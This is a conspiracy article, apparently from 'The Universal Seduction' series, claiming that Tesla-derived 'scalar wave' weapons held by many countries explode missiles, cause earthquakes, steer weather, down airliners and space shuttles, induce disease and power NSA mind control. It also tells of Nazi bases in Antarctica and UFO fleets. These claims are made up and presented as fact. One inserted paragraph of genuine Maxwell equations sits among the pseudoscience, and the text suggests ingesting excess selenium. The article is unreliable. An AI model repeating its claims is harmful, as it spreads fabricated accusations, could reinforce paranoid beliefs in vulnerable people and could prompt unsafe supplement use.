A scalar beam can be sent from one transmitter to the target, coupled with a second beam sent from another transmitter, and as they cross, an explosion can be made. This interference grid method could enable scalar beams to explode the missile before launch, as well as en route, given the right coordinates. If the target does manage to launch, what are known as Tesla globes or Tesla hemispheric shields can be sent to envelop a missile or aircraft. These are made of luminous plasma, which emanates physically from crossed scalar beams, and can be created at any size, even over 100 miles across. Initially detected and tracked as it moves on the scalar interference grid, a continuous EMP (electromagnetic pulse) Tesla plasma globe could kill the electronics of the target. More intensely hot Tesla 'fireball' globes could vaporize the missile.
Tesla globes could also activate a missile's nuclear warhead en route by creating a violent low-order nuclear explosion. Various parts of the flying debris can be subjected to smaller, more intense Tesla globes, where the energy density is more destructive than in the larger globe first encountered. This can be done in pulse mode, with any remaining debris given maximum continuous heating to vaporize metals and materials. If anything still rains down on Russia or America, either could already have raised a Tesla shield over the targeted area to block it from entering the airspace.
2. HOW WERE SCALAR WAVES DISCOVERED?
Scalar wavelengths are finer than gamma rays or X-rays and only one hundred-millionth of a square centimeter in width. They belong to the subtle gravitational field and are also known as gravitic waves. Uniquely, they flow in multiple directions at right angles off electromagnetic waves, as an untapped energy source called 'potentials'. Potentials are particles which are unorganized in hyperspace: pure etheric energy not manifest in the physical world. In comparison, the electromagnetic waves we are familiar with (measured in hertz, or pulses per second, e.g. radio waves) exist normally in the physical world, but can only be measured up to levels determined by the sensitivity of the equipment being used to register how many cycles per second they operate at.
Scalar waves were originally detected by a Scottish mathematical genius called James Clerk Maxwell (1831-1879). He linked electricity and magnetism and laid the foundation for modern physics, but unfortunately the very fine scalar waves (which he included in his research) were deliberately left out of his work by the three men, including Heinrich Hertz, who laid down the laws taught as the discipline of physics at colleges. They dismissed Maxwell's scalar waves or potentials as "mystical", because they were physically unmanifest and only existed in the "ethers", and so they were deemed too ineffectual for further study. These enigmatic scalar waves (more powerful even than microwaves when harnessed and concentrated into a beam) might have been forgotten, except that Nikola Tesla accidentally rediscovered them. He'd originally worked with Thomas Edison, who discovered direct current, but Tesla discovered alternating current; the two men disagreed and eventually parted ways, and Tesla later built on the research of the German Heinrich Hertz, who was proving the existence of electromagnetic waves. Tesla found, while experimenting with violently abrupt direct current electrical charges, that a new form of energy (scalar) came through.
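For reference, here is the textbook form of the electromagnetic theory being discussed (standard physics material, added for context rather than taken from Verismo's article). The four vector equations taught in colleges today are the later condensation of Maxwell's work usually credited to Heaviside and Hertz:

$$\nabla \cdot \mathbf{E} = \frac{\rho}{\varepsilon_0}, \qquad \nabla \cdot \mathbf{B} = 0, \qquad \nabla \times \mathbf{E} = -\frac{\partial \mathbf{B}}{\partial t}, \qquad \nabla \times \mathbf{B} = \mu_0 \mathbf{J} + \mu_0 \varepsilon_0 \frac{\partial \mathbf{E}}{\partial t}$$

Maxwell's own 1873 Treatise formulation was much larger (twenty equations in twenty variables) and worked directly with the scalar potential $\phi$ and the vector potential $\mathbf{A}$, which enter the modern equations through $\mathbf{B} = \nabla \times \mathbf{A}$ and $\mathbf{E} = -\nabla \phi - \partial \mathbf{A}/\partial t$; these are the 'potentials' the article keeps referring to.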
By 1904, Tesla had developed transmitters to harness scalar energy from one transmitter to another, undetectably bypassing time and space. He could simply materialize it from one place to another through hyperspace, without the use of wires: it was just drawn right out of the space-time vacuum into a transmitter and into a beam which could be targeted at another transmitter. Unfortunately he got no financial support for replacing electricity, which used wires and therefore earned money, and to this day this is the reason why scalar energy is still not acknowledged in mainstream physics. Tesla, even though he discovered more for mankind in science than many others, is still not credited in science books for his discovery of scalar waves, a source of "free energy" obtainable as a limitless supply of power that costs nothing. Other inventors have sporadically rediscovered "free energy", but have come to harm or have been silenced with millions of dollars in hush money, a small sum compared to the sale of electricity, oil, gas and a myriad of other energy products which would then be rendered worthless. Money-hungry big business has harshly crushed any opposition to its own riches, generated by multiple obsolete, earth-polluting fossil fuels.
3. A CLOSER LOOK AT SCALAR WAVE-FORMS
These finer scalar wave-forms have also been discovered periodically by other mathematicians, who have been able to calculate new equations, especially in harmonics (used in hyperdimensional physics), connecting the wavelengths of matter, gravity and light to each other and showing how all these lock in and create our expression of time (as it manifests in space), which has now been discovered to be untapped 'potential' energy flowing in hyperspace.
Time flows like a wave-form river in hyperspace in a grid pattern. This consists of interlocking great circles which circle the poles and include a lattice grid of lines that are 30 nautical miles or 55.5 km apart. When scalar beams charge through hyperspace these 'rivers of time' get blocked and redirected temporarily.
There is a covert plan afoot to change the way time is expressed on this planet altogether, using hyperdimensional physics and Tesla technology, by splicing earth back onto a now-defunct Atlantean timeline in which Lucifer hadn't fallen from grace. (See my other work on this in the books The Universal Seduction Vols 2 and 3, listed at the end of this article.)
Our present 'reality' is expressed in the way time runs around the corridors in hyperspace, by the pattern it takes. Other 'timelines' exist in a different kind of grid pattern, creating alternative versions of our 'present'. Multiple versions of reality (of, for example, 2 April 2004) can be manipulated given the right technology, and people can enter into parallel universes, do all sorts of things, and then enter back into this one.
One needs a Tesla Zero Time Reference Generator, which can lodge a specific reality into the time at the center of the universe, where it stays still, acting like an anchor. Both the American and UK governments are able to manipulate and enter into different realities.
The various dimensions each comprise a complex pattern of interlocking wave-forms. Matter has been found to be only one wave of a pulse comprising a positive cycle, while the negative cycle manifests as 'anti-matter'. The 'matter' pulse brings something 'into' physical visibility, then it disappears momentarily and returns. But the pulses are so rapid that we never see something as unmanifest while it is temporarily dematerialized. Physical time is only measured by the visibility of something's aging process, in other words its passage through a journey from one measured time-reference point to another.
Different wave-forms only appear solid to us because we are composed of the same matter. If the frequencies governing the time between a matter pulse and an anti-matter pulse are shortened or lengthened with technology, time will go faster or slower in the surrounding space, or in whatever it affects. Therefore scalar waves belong to space-time, in which anti-matter or hyperspace exists. Time can be altered by harnessed and directed scalar waves (including magnets, which give off scalar waves that bend time) because they disrupt the pulse of matter and anti-matter, and therefore the rate at which something normally passes through time with its usual smoothness.
An experiment with scalar waves in the USA once caused all the clocks and watches in the test neighborhood to go berserk for 4 days, until the flow of time resettled to normal and they ran as before. This was noted by Frank Golden.
Scalar 'potentials' can be created artificially and, when focused into a weapon, can do major damage to an object's location in space-time. That which determines the object's natural pulse of the matter and anti-matter cycle can become stressed when targeted by scalar waves made of artificial potentials, because they are almost always absorbed by the nucleus of an atom, not the electrons in orbit.
Hyperspace can become temporarily warped, although space-time naturally curves around the natural vortexes the earth has, which form 'chakras' to absorb and release universal energies. These are opened and closed in natural cycles according to the positions of the sun and moon in relation to earth. Because scalar waves are finer than gamma waves, they can pass through any physical substance undetected. Yet the damage inflicted can be so powerful that they can dislodge an object right out of time and space and cause it to temporarily disappear from its normal movement in time. All objects move in time, and they will also move in space if a physical external force activates the object's own natural internal scalar waves to point in the direction it is being sent, causing it to move from A to B depending on how much force is used. Alternatively, they are trapped motionless in space by the internal scalar energy swirling around and interlocking into a deadlock (making the object appear still), although the object still moves in time. A beam of scalar energy can cause the timeframe the object resides in to become warped, making it disappear into another reality.
4. HOW DO SCALAR WEAPONS WORK?
Particles which are unorganized in hyperspace (potentials) can be harnessed to recreate multiple frequencies of scalar waves, and these can now be manufactured artificially, including frequencies between infrared and ultraviolet. If a transmitter is at a higher reference 'potential' than the interference zone of 2 crossed scalar beams, energy emerges into the plasma 'bottle' and materializes physically; this is called 'exothermic' mode. It can cause explosions, 'nuclear-like' ones if set at a high frequency. Even though no electromagnetic energy has flowed through the space between the transmitters and the target, because it has bypassed physical space the energy can suddenly appear faster than the speed of light and destroy something without warning. It exists only as a locked-in artificial potential, a directed 'river of force' in hyperspace, and it is entirely undetectable with conventional scientific equipment, which is where the danger lies.
Nobody can ever know what the enemy is planning, or even who their enemies are, and because it never gets any press, normal military personnel without this knowledge would never know what hit them, especially if it is scalar mind control. To extract energy back to the transmitters from the energy bottle of 2 crossed scalar beams, the potential must be set at a lower mode; this is called 'endothermic' mode, and as energy is extracted out of the 'bottle' area a freezing will occur, possibly causing a thunderous sound.
When 2 transmitters send timed pulses which meet, an explosion will occur which either produces energy or extracts it. If 2 crossed beams are in 'continuous' mode, the energy between the beams is continuous, and Tesla globes and hemispheres can be made which act as a continuous shield, destroying incoming weapons and aircraft that enter it. If multiple frequencies are transmitted on the beams, a 3-dimensional globe appears at the intersection.
This can be manipulated to have very highly infolded energy, with any desired light emission, shape, color or intensity. It can even cause metal to soften or melt. This 'bottle' of energy can be detonated inside the earth to create an earthquake, or inside a building to make a 'nuclear-like' explosion. The 'bottle' can be moved anywhere on the planet, or through it, and made any size.
In 1985 the Russians once threatened the earth itself by activating their scalar weapons with multiple scalar transmitters turned on at once, endangering the survival of the entire planet. According to nuclear physicist Bearden, they conducted a massive, 'full up' strategic exercise of their scalar weapon systems and communications. During this sudden exercise the American Frank Golden discovered the Russians had activated 27 gigantic 'power taps', established by resonating the earth electrogravitationally on 54 powerful scalar frequencies (27 pairs, the two members of each pair separated by 12 kHz) transmitted into the earth, which they used to stimulate the earth into forced electrogravitational resonance on all 54 frequencies. Each of the 27 power taps extracted enormous energy from the molten core of the earth itself, turning it into ordinary electrical power.
Each giant tap is capable of powering 4 to 6 of the largest scalar EM howitzers possessed by Russia. Bearden writes: "Apparently over 100 giant scalar EM weapons were activated and a large number of command and control transmissions and it lasted several days. By alternating the potentials and loads of each of the two paired transmitters, electrical energy in enormous amounts can be extracted from the earth itself, fed by the 'giant cathode' that is the earth's molten core. Scalar EM command and control systems, including high data rate communications with underwater submarines, were also activated on a massive scale. The exercise went on for several days, as power taps were switched in and out, and command and control systems went up and down." Bearden claims not one American intelligence lab or scientist detected this, as they had no detector for scalar EM radiation, and that not one officially believes the exercise ever happened. However, it was monitored on an advanced, proprietary detection system by Frank Golden for several days, and by Bearden for several hours.
This exercise bore out Brezhnev's 1972 statement that by 1985 the Soviets would be prepared to do as they wished, anywhere in the world. The Soviets are exploiting unknown attributes of matter, phenomena and laws of nature, with research already covering the equivalent of 7-8 U.S. atom bomb projects back to back.
However, both America and Russia are conducting through-the-earth scalar beam transmissions, and ever since then the earth's internal dynamo has been affected. It experienced a sudden, unexpected slowdown in rotation in 1984. It has become like an unbalanced washing machine, wobbling as it spins. Scalar waves pass naturally between the center of the earth and the sun, and this, coupled with multiple annual nuclear tests (which have been proven to disturb the ionosphere and magnetic field) and the balance of the earth with the moon, may even cause the earth to flip, if the naturally produced scalar waves which keep the earth spinning harmoniously are diverted onto another course.
5. WHAT CAN SCALAR WEAPONS DO?
A Tesla shield protecting a military target could be made of three or more concentric shields that would produce multiple electromagnetic pulses and severe heating of anything which enters them. These concentric Tesla shields can also clean up and sterilize any gamma radiation resulting from the explosion of a nuclear warhead.
Even in the 1920s, Nikola Tesla could create a protective 3-dimensional 'shield' or 'dome', formed by 2 or more transmitters sending widened scalar beams linked together over a target in a hemisphere shape. Instead of causing the target to explode, as narrower, more intense crossed beams would, a wider, more encompassing beam could form a large plasma shell around something to be protected. This acted like an electrifying force field shaped like a dome, which could cause the technology of anything entering it to be dudded (rendered inoperative), kill incoming aircraft pilots by destroying their nervous systems, and/or make an incoming missile, aircraft or tank blow up.
Multiple layers could be nested, made of different kinds of plasmas, which would ensure nothing could penetrate a protected target's groundspace or airspace. The Russians can make a Tesla shield up to 200 miles wide. These large luminous plasma shields have been witnessed by sailors over the oceans from time to time, as various nations test their scalar weapons in secret. Tesla, as early as the 1920s, created globes or bullets of plasma with crossed scalar beams, either sucking the energy out of the airspace in a 'cold explosion', causing it to freeze, or sending extreme heat into it to burn, like a very powerful laser beam.
These powerful beams can also travel right through the earth and create an earthquake at the antipodes, and Tesla experimented with doing this too. Hyperspace flux energy (potentials) flows as waves in a sea of intense power in the next dimension, unharnessed; however, when energy is manufactured artificially it can be made into different modes, e.g. pulse mode, energy extraction mode or explosion mode. If 2 timed pulses meet, an extraction explosion makes a sharp cooling, and all heated energy is extracted out of the air back to the transmitter. This can leave everything and everyone frozen. It preserves machines and buildings, but not people. If a burning energy is sent, the target suffers a nuclear-like 'detonation', because energy emerges at the target, destroying the nucleus of the atoms. Multiple scalar wave modes and frequencies can also be blended together into one beam.
Tesla globes can be made small or large, in manifold kinds of energy frequencies, and directed to a target by 2 or more faraway scalar transmitters. Many small, intense-frequency globes can be directed towards multiple incoming targets like cannonballs, causing major explosions. Alternatively, a larger, less intense globe can cause the electrics of a plane, helicopter or missile to dud, making it malfunction and crash-land. This technology has been used many times to crash planes or helicopters, using a portable scalar bazooka carried by a hidden terrorist or soldier.
The Vietnamese and Soviets used this technology in the Vietnam war against American aircraft. Many plane crashes with inexplicable causes can be traced to this. These Russian-made portable bazookas were also used by the Serbs against American helicopters during the Bosnian war, and the Soviets used scalar weapons against the Afghans during their war. One may wonder if this explains current American helicopter crashes in Afghanistan and Iraq.
Scalar waves can be used for impenetrable communication inside an ordinary carrier wave. Artificial potentials can be used for 2-way communication with submarines, aircraft and ships. Scalar waves can be used to tap into normal communications even when encrypted; the eavesdroppers can even destroy the enemy's equipment, using lock-in mode to locate the source, or simply continue listening. Radar invisibility can be achieved by putting multiple transmitters around something to make a spherical interference shell in the bandwidth of the searching radar. Nothing in the air is safe from scalar weapons, nor anything on the ground, because any building can be penetrated and the contents inside destroyed by either narrow or wide crossed beams.
There is nowhere to hide. Scalar beams can be sent by aircraft or satellite, or even from the government UFOs of Russia, Britain, Australia and America. They can be sent from the UFOs the Nazis developed secretly in Germany during WW2, which were relocated to their underground bases in Antarctica and all over South America before the war ended.
6. SCALAR BEAMS AGAINST INDIVIDUALS
To totally destroy a person's nervous system and kill them instantaneously, a scalar weapon can be set on 'high intensity pulse mode'. This will destroy every living cell, bacterium and germ, so the body falls down like a limp rag, not decaying even in 30-45 days. There is no living aspect left to decay. Entire groups of people can be killed this way, even within a 50-mile radius at peak power. Scalar beams set on a lower power can render a person unconscious, to be revived at a later date for interrogation.
Crossed scalar beams can cover a whole range of targets, from something right through on the other side of the earth to anything under the sea or ground. Not even metal offers protection, as a metal-softening mode can be deployed. Scalar beams can be put into an X-ray-like mode, where a screen can show what is inside something, even under the sea or earth or inside buildings. This is called remote viewing radar.
Anything in the sky can be instantly destroyed, even from one country to another. All one country needs in order to destroy anything skybound in an enemy's country is to set up 2 or more scalar transmitters forming a scalar wave-form interference grid, whereby a shield is locked over the country in high intensity mode; this will cause anything which enters it to be destroyed. It can also destroy anything in the sea and detonate mines. The explosion shows up on the screen as a blossoming of the moving light on the grid square.
The Russians mainly use their interference grids over the USA to control the weather, moving hot or cold air to where the two can meet and create storms, hurricanes, torrential rain or droughts as they please. Earthquakes can be created, along with volcanic eruptions, according to Tom Bearden. Moisture can be brought from the ocean and sent overland, and cold air from the north sent south. Violent thunderstorms can be created. He also claims that since 1989 the Japanese Yakuza and Aum sects have leased scalar interferometers from the Russians to do weather engineering over the USA.
However, America can fight back with its own scalar weapons. Passenger planes can be silently downed as need be by sending a low frequency scalar beam to make the engine fail, either from the interference grid squares or even from portable shoulder-fired scalar bazookas, which can be targeted at helicopters or any aircraft above. Surface naval vessels can be attacked through their hulls, and ocean-bottom mines detonated. Any aircraft or land vehicle, including tanks, can be fitted with portable scalar weapons, though tanks can easily be destroyed with them.
Tom Bearden claims that the Soviets and Americans have been silently downing each other's aircraft since the 1980s. Soviet-made scalar weapons downed American aircraft in Vietnam. Right from when the USA put up its first satellites, the Russians were shooting them down from cloaked Russian-made UFOs with scalar and particle beam weapons. Between 1977 and 1982 Russia shot down many US satellites. At that time they wanted complete control over the skies, and had put up killer satellites complete with beam weapons to target US satellites and even the space shuttles. Tom Bearden has claimed that all the early space shuttles were shot down by the Russians, and that duplicate shuttles were landed from another base.
There was a mad rush by the US govt to develop beam weapons to defend itself against the Russians, and it eventually did so, shooting down a couple of the Russian-made UFOs containing beam weapons. Silent revenge followed, with passenger planes of each other's countries being targeted.
7. SCALAR MIND CONTROL
In the early 1970's, hundreds of inmates at the Gunnison Facility of the Utah State Prison were subjected to scalar wave mind control. Inmates tried unsuccessfully to fight back in court. The University of Utah researched at that time how scalar waves could induce the mind into hearing voices, overriding and implanting thoughts into the mind, as well as reading the thoughts. They also developed eye implants. In 1998 scalar waves were used to test subliminal voices in the head in 2 Utah prisons.
In Draper Prison, Utah, a man called David Fratus claimed in 1988 that voices were induced in his inner ears, as clear as if he were listening to a set of stereo headphones. The mind control victims of US govt implants are also subjected to artificial voices in the head, sent on scalar beams by satellite and the HAARP transmitters and relayed to the GWEN towers placed approximately every 200 miles across the USA. Many of the messages relayed into these American mind control victims are said to come from aliens, with a 'message for mankind'. These 'alien messages' were first given to the prisoners in Utah, and they all got the same messages.
The Russians, having a head start on decoding the brain, can send subliminal messages by satellite over whole countries in their own languages, in scalar waves so subtle that the victims think their own thoughts are occurring. They could make people think "God" is speaking to them, and can also give people suicidal thoughts; there is a suicide wavelength. The Russians and Israelis have been said to do this on mind control data websites. As well, the Americans have been using these subliminals to give 'voices in the head' messages (including to those with CIA or military controlled implants) that are supposedly from 'aliens' or "The Holy Spirit", saying e.g. that the Second Coming will be here soon, or that earth needs to be evacuated and the person has been 'chosen'.
Only certain people can pick this up, according to whether they have implants (which relay messages into the head) or are natural telepathics. The mineral selenium, when ingested beyond normal levels, is said to increase the capacity to hear voices in the head, though certain races have a higher hearing threshold and are able to pick up synthetic telepathy sent through the atmosphere more than others.
Russia's scalar transmitters are called "Woodpeckers" because of the woodpecker-like tapping transmissions detected from them on the radio band. They have the technology to send subliminals right into a person's subconscious, bypassing the brain, and could drastically influence the thoughts, vision, physical functioning, emotions and conscious state of a person by sending in subliminal signals, even from a great distance. In the late 1960s the Soviets broke the genetic code of the human brain: it had 44 digits or less and employed 22 frequency bands across nearly the whole EM spectrum, but only 11 of the frequency bands were independent. The Soviets found they could make a person do something just by sending subliminals into the body, bypassing the ears.
Up to 16 of the Russian Woodpecker scalar transmitters have been observed to carry a common phase-locked 10 Hz modulation. 10 Hz is used to put people into a hypnotic state. The Russians can manipulate the moods of everyone in a 75-mile radius with a circularly polarized antenna, and people's bodies have been shown to pick up the "new" mode of expression. Even a "sleep" frequency will make everyone tired and fall asleep.
8. AMERICA'S 'NO CONTACT' MASS MIND CONTROLLING NETWORK
According to the book Project L.U.C.I.D by Texe Marrs, John St Clair Akwei claims that the US National Security Agency (NSA) has had the most advanced computers in the world since the 1960's. The Signals Intelligence (SIGINT) mission of the NSA uses scalar waves for blanket coverage of the USA: it can wirelessly tap into any computer in the USA and read the contents, as well as track people by the electrical currents in their bodies, which emanate a particular 'signature frequency'.
This is possible because everything in the environment gives off scalar waves, at right-angle rotations off the normal electromagnetic wave. These can be searched for and tracked, and are not subject to the constraints of time and space. A person's frequency can be stored on a supercomputer and tracked anywhere. They can be sent subliminal words in scalar waves so subtle that the person will think they are their own thoughts. The NSA also uses a secret program (developed since the MKULTRA mind control program of the 1950s) called "Radiation Intelligence". Scientific research from this is withheld from the public, and there are international intelligence agreements to keep this technology secret. Using this technology, the NSA records and decodes individual brain maps of hundreds of thousands of people for national security purposes.
It is also used secretly by the military for a brain-to-computer link. Activity in the speech center of the brain can be translated into the subject's verbal thoughts, and activity from the visual cortex can be shown on a video monitor. NSA operatives can see what the subject is seeing. Visual memory can also be seen, and the NSA can place images directly into the visual cortex, bypassing the eyes and the optic nerves.
When a target sleeps, images can be secretly installed into the brain during REM sleep for brain-programming purposes. Speech, 3D sound and subliminal audio can also be sent to the auditory cortex of the brain, bypassing the ears. This "Remote Neural Monitoring" (RNM) can completely alter a subject's perceptions, moods and motor control. Different brainwave frequencies are connected with various parts of the body, and when the right frequency to activate a section of the body is sent, a person is powerless to stop it. Pain can be induced in mind control victims this way by targeting a section of the body. Many mind control victims have spoken of this, accompanied by 'voices in the head' from the operators cruelly asking if it hurt, all done remotely without any physical contact with the victim. There has been a SIGINT wireless scalar wave brain monitoring network in the US since the 1940s, according to John St Clair Akwei.
He tells us how it is done: by digitally decoding the evoked 'potentials' (see the first section for more on potentials) in the 30-50 Hz, 5-milliwatt electromagnetic emissions from the brain. In these emissions, spikes and patterns show as evoked potentials. "Every thought, reaction, motor command, auditory event and visual image in the brain has a corresponding "evoked potential" or set of "evoked potentials"." These can be decoded into the current thoughts, images and sounds going on in a target's brain. When complexly coded signals are sent to a victim, bypassing the eyes, optic nerves and ears, faint images appear as floating 2D screens in the brain. Auditory hallucinations can be induced, creating paranoid schizophrenia.
The frequencies the brain areas respond to range from 3 Hz to 50 Hz. For each brain area these are used (brain area: bioelectric resonance frequency: information induced through modulation):

Motor control cortex: 10 Hz: Motor impulse coordination
Auditory cortex: 15 Hz: Sound which bypasses the ears
Visual cortex: 25 Hz: Images in the brain, bypassing the eyes
Somatosensory cortex: 9 Hz: Phantom touch sense
Thought center: 20 Hz: Imposed subconscious thoughts

Only the NSA modulates this signal band into evoked potentials or scalar carriers. About 100 people work 24 hours a day for the NSA at Ft Meade on this "Remote Neural Monitoring" (RNM). John St Clair Akwei, after being harassed by this NSA technology, brought a lawsuit against the NSA.
During the lawsuit process he was harassed by 3D sound, and his associates were also harassed to keep him isolated. No action was taken against the NSA in the 1991 lawsuit. In 1967 an "internationally renowned scientist" and Christopher Hills, a pendulum expert, communicated with some ETs. (It is not known who the scientist was, but at one time both Hills and Puharich were working with the medium Eileen Garrett, and Puharich was communicating with ETs called The Nine: the same ETs consulted by the Bilderberger group (comprised of world leaders and European royals), who control the affairs of the planet.) This is what the ETs told Christopher Hills via pendulum:
In short, ETs communicated with us via modulated radio waves, between 10,000 and 20,000 cycles below the known electromagnetic spectrum: in the carrier wave by amplitude modulation, mixed with frequency modulation; single band energy, transmission power less than 25 watts; a naturally present wave on earth which the brain modulated, a wave that resonates between the earth and the ionosphere. All humans influence the ionosphere in this manner. A reflecting technique is involved. The brain modulation consisted of pulses, akin to known neuro pulses.
Two humans can use this. It is related to something akin to low frequency radar and to ultrasonic techniques, but qualified: a mixed electro-acoustic wave function. The electromagnetic wave induced an ultrasonic transduction in human tissue. The brain radiation has a sonic component to it as well as an electromagnetic component; electromagnetic radiation has a sonic component, dependent on the medium through which it travels. The scientist cut through months of work. Now HAARP is slicing up the ionosphere, the world-brain, like a microwave knife, producing long tear incisions and destroying the membrane which holds the reservoir of data accumulated by all earth's history. HAARP has already punched 360 x 30-mile holes in the ionosphere.
9. INDUCING DISEASES WITH SCALAR WAVES
Tom Bearden also writes that a more advanced form of scalar weapon, known as a 'quantum potential' weapon, has been developed by the US, Russia, China, Israel and possibly Brazil. These weapons mimic the signature or frequency of a disease by recreating it on scalar carriers. Any disease can be imprinted onto our cellular system this way, using frequencies ranging from ultraviolet to infrared.
Whole populations can have new diseases and death induced, as well as latent diseases activated, with quantum potential diseases in targeted areas. Manufactured symptoms of radiation poisoning, chemical poisoning, bacterial infection and even the effects of many kinds of drugs, including hallucinogenic ones, can be induced with these very subtle scalar waves, which flow in hyperspace or the sea of ether. They become embedded right into the immune system, or etheric counterpart, of the physical body.
According to the www.freedomdomain.com site, a man called Kaznacheyev found that the induction of diseases could be effected by the Woodpecker scalar transmitters in the near ultraviolet range. Experiments at the University of Marburg in West Germany duplicated these disease-inducing scalar wave experiments in infrared. Dr Popp of West Germany, after analyzing the virtual photon master control system of the cells, found that the scalar virtual particle flux which determines the genetic blueprint pattern of the cells can easily be entered with scalar techniques to induce disease and cell disorder at will.
10. TESLA'S SCALAR WAVE TECHNOLOGY WAS SECRETLY CONTINUED BY RUSSIA AND THE NAZIS
While the American government rejected Tesla's energy without wires and left him penniless, Russia and Germany asked Tesla to work for them. He turned them down, but according to Preston Nichols he faked his death in 1943 and was spirited away to the UK. From then on it was a frenzied battle between the Soviets and Germany to develop scalar technology. Russia got a head start in learning how scalar waves can be drawn from hyperspace by sending an agent to seek out a man in Utah who had built a machine for doing this. The Soviet agent destroyed the device after learning how the machine operated.
The man, T. H. Moray, had learned about Tesla's 'sea of ether' and had made a scalar interferometer. Germany had developed anti-gravity technology in 1939 by back-engineering a crashed UFO. By WW2 they led the world in radar and infrared science, as well as radar-absorbing materials and radar cross section. Some leading western experts think they developed radar cross section beyond western levels of today, but there is evidence of an alien alliance during the war, so this may have been influential. The Germans were using time-reversed waves, which caused a scalar wave to follow back and respond to the source of a received ordinary electromagnetic wave.
During WW2 many of the best Nazi scientists escaped to a base they'd secretly developed in Antarctica, which got supplies from South Africa, as well as to German communities in Argentina, Chile, Paraguay, Peru, Uruguay and other Latin American countries. After the war the Americans moved the remainder of the best Nazi scientists to the US, with the Soviets, French and British taking the rest to their countries. However, the Soviets became angry at the Americans for taking first choice of Nazi scientific brains, so in 1946 they simply cleaned out the majority of the remaining scientists and technicians back to the Soviet Union: about 275,000 men, plus all their families, from Soviet-occupied eastern Germany.
By 1950 the Soviets had developed time-reversed waves. They had also forced the captured Germans to build them a fleet of anti-grav saucers complete with particle beam and scalar beam weapons. In Antarctica the Nazis had Tesla's "Death Ray", capable of sending a lethal beam even to the moon, creating an incandescent spot when aimed at it. This "Death Ray" has been likened to a modern-day particle beam weapon.
According to Al Bielek, the Russians have particle beam weapons which can shoot 1000 miles into space, and they use these to shoot down any UFO within a 200-mile radius of their sky. The Americans also have many particle beam weapons, and they too shoot down UFOs. There is apparently a war going on in space, and the Russians and Americans have secretly got together to fight it. It is unknown who the UFO occupants are, but the Nazis in Antarctica are said to be invincible with their superweapons.
11. IS THERE A SECRET WAR GOING ON IN THE SKIES?
Japan now has scalar weapons and has got together with Russia to develop them. In 1991, according to Harry Mason, Soviet President Gorbachev offered to lease the Japanese, for $900 million, the super-secret intercontinental scalar weapons capable of producing earthquakes, which had been used in the Soviet Union since the 1960's. Tom Bearden also claims they were leased in 1989. A joint Russian-Japanese university was set up to develop new weapons with Japanese microchips, to overpower the US and jointly rule the world. After Tesla "died" in 1943, his papers were sent to a Tesla Museum in Yugoslavia, where the Japanese obtained the knowledge of Tesla technology. The scalar weapons were developed by a Japanese scientist with an IQ higher than Einstein's.
They too, like the Americans, tested their scalar weapons in the outback of Western Australia, possibly using a base in Antarctica from which to send scalar waves to their Australian transmitter to produce earthquakes and Tesla globes. The Japanese scalar scientists are tied up with various cults and feel that the Japanese emperor should rule the planet, as well as having a policy of exacting revenge on former enemies, culminating in a "Final War" against the Christian west and the Islamic world.
It is the Japanese Aum sect and Yakuza mafia who are still leasing the Russian scalar transmitters, and they have steadily used them for weather engineering over America since the nineties, for target practice. Bearden claims that the Japanese may be allowed by the Russians to down planes now and then. The Japanese cult members in their govt are also tied up with North Korean cult members. The Russians themselves have been weather engineering over America since the 1960's, using their interference grid to target specific areas.
12. WHO ELSE IS CONTINUING TESLA'S SCALAR TECHNOLOGY?
Unlike Western universities, those of Eastern Europe and Russia have always openly included Tesla's scalar wave research in their curriculum, and so they got a head start, with multiple facilities built all over the Soviet Union to construct scalar weapon transmitters starting from the 1950's. This was further hastened by making captured East German scientists work for the Soviets, leading that country straight into the space age and giving them UFOs fitted with scalar and particle beam weapons.
The UFOs even had cloaking technology. America, even though it had Nazi scientists working on anti-gravity at Area 51 after the war, didn't realize how advanced the Soviets had become with scalar technology until it found out it had been secretly attacked, undetected, during the 1950's. In 1960 the Soviet premier Khrushchev announced to the world that they had "superweapons". In 1963 they deliberately destroyed a US atomic submarine undersea by Puerto Rico with scalar weapons. The next day, over the Puerto Rico Trench, the Soviets used scalar weapons in a different mode to produce a giant underwater explosion. The US was defenseless against an unknown type of weapon. In 1965 the Great Sandy Desert in Western Australia was mapped out and chosen by the US govt to begin scalar weapons testing.
Even though 'officially' Tesla's papers were kept by the FBI after he died and were labeled 'top secret', lest they get into the hands of the enemy, Tesla had passed all his knowledge and research on to a young American physicist 2 weeks before he died in 1943. The US military in Western Australia tested crossed scalar beams aimed into the ground to create earthquakes on a target map of squares, and also created Tesla globes from crossed scalar beams in the sky. Pine Gap, the secret underground American military base, has 2 scalar transmitters, and there is at least one more at Exmouth, north-western Australia. Other American scalar transmitters, besides various ones all over the USA, are in Alaska, Puerto Rico, Greenland, Norway and Antarctica.
Though many countries have scalar weapons now, other countries could easily be targets of those with scalar weapons and never know the cause of their explosions, mind control or weather engineering. So of course more and more countries are acquiring the scalar technology, needing it to defend themselves, and it keeps getting passed on, especially by the Russians. The other problem is that one may know it is a scalar attack, but have no idea who did it. The known countries which have scalar weapons are: America, Russia, France, Australia, Germany, Japan, China, Taiwan, South Africa, Israel, Brazil, the UK and Argentina, as well as various populations of Nazis still operating in Antarctica and all over South America. It is unknown how the Brazilians got scalar weapons and quantum potential weapons, but the Brazilians have had alien technology for some time, and the Vatican also has covert technology and has been said to have a base for this in South America for its secret space program.
There is extensive coverage of Brazil's space program in my 40-page article "Scalar Weapons: Read It and Weep". This covers China's and Japan's weapons, as well as extensive coverage of Russia's attacks on America, especially the space shuttles, and the technology of the Nazis in Antarctica. Others, such as Ukraine and North Korea, may have them, but as yet no proof exists for these countries. Even in the alternative press not enough has been said about scalar weapons for ordinary conspiracy researchers and writers to be as familiar with their dangers as they should be; even online, they hardly get a mention on conspiracy sites. Yet they are probably the most life-threatening weapons known on the planet.
For more information see: http://www.theuniversalseduction.com
The Universal Seduction Vol 3: Scalar Weapons. Read It And Weep by Christi Verismo.
For more on America's use of Tesla technology and joint alien/US military underground bases in Australia, anti-gravity technology and the use of time portals:
The Universal Seduction Vol 2. Pine Gap, Australia's Area 51 by Christi Verismo.
The Lost Journals of Nikola Tesla by Tim Swartz and Mind Control by Tim Swartz, in The Universal Seduction Vol 1;
and The Lost Journals of Nikola Tesla: HAARP - Chemtrails and the Secret of Alternative 4
http://www.members.tripod.com/uforeview/swartz.html
Secret Black Projects of the NWO by Tim Swartz. Abelard Productions.
http://www.members.tripod.com/uforeview/swartz.html
About the Nazis in Antarctica:
Evil Agenda Of The Secret Government By Tim Swartz
http://www.members.tripod.com/uforeview/swartz.html
Nikola Tesla: Journey to Mars - Are We Already There? By Sean Casteel
http://www.members.tripod.com/uforeview/teslabooks.html
